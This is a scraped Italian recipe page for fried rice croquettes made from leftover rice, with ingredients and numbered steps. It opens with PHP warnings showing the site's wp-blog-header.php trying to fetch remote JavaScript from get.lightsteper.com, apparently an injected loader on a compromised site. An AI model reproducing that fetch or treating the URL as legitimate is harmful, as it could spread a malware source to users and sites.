Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: No such host is known. in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17

Warning: file_get_contents(http://get.lightsteper.com/scripts/way.js): failed to open stream: php_network_getaddresses: getaddrinfo failed: No such host is known. in D:\inetpub\webs\youmumcom\wp-blog-header.php on line 17
Crocchette di riso - YouMum

Crocchette di riso 

Riproduci video

Friggete poco, consapevolmente ma con grande soddisfazione!

Queste crocchette di riso home made non hanno nulla da invidiare agli arancini delle gastronomie!

Sono sorprendentemente croccanti, pur senza uova e preparate con un ingrediente di riciclo come il riso del giorno prima!

Il successo è garantito e riuscire a trasformare una sbobba poco invitante in uno street food divertente e appagante, ottimo per delle merende rinforzate, un aperitivo tra amici o un pic-nic in famiglia, è un’arte che ogni mamma dovrebbe conoscere.

Siete pronte?

Partiamo!

 

Ingredienti
  • 2-3 porzioni di riso o risotto avanzato
  • 1 ciotola di farina tipo 2
  • 1 ciotola acqua
  • Sale q.b
  • Pangrattato
  • Olio di girasole bio (per friggere)

 

Procedimento
  1. In una ciotola versate acqua e farina (la proporzione è 1:1), aggiungete una presa di sale e amalgamate il tutto fino a creare una pastella semiliquida.
  2. Prendete ora il vostro riso avanzato ed eliminate eventuali grumi sgranandolo con le mani.
  3. Formate ora delle polpette della dimensione che preferite (più piccole sono più croccano!).
  4. Immergetele una ad una nella miscela di acqua e farina, scolatele dalla pastella in eccesso e cospargetele di abbondante pangrattato.
  5. Nel frattempo, mettete a scaldare l’olio di girasole (o sesamo) in una pentola dai bordi alti, con una fiamma moderata (né violenta, né fioca).
  6. Solo quando l’olio comincerà a sfrigolare, allora cominciate ad immergere le vostre crocchette impanate, una alla volta, sia per non rischiare di romperle, sia per non alterare la temperatura dell’olio troppo repentinamente.
  7. Se usate il sistema che uso io (vedi video), in cui utilizzo l’olio necessario a ricoprire le crocchette solo per metà per non consumarne troppo, quando il fondo delle polpette vi risulterà dorato e croccante allora sarà il momento di ribaltare delicatamente le vostre crocchette ed aspettare che si dorino anche dall’altra parte.
  8. A doratura completa, scolate le crocchette una per una, eliminando l’olio in eccesso. ( il colino con pinza che uso io è davvero un aiuto per compiere questa operazione con facilità.)
  9. Salatele con del sale marino integrale fino e servite….

 

Il crick crock è assicurato!

 

Enjoy,

Baci Verdi

Vuoi sorprendere la tua famiglia con ricette nuove, semplici e alternative?

Clicca qui per guardare tutte le ricette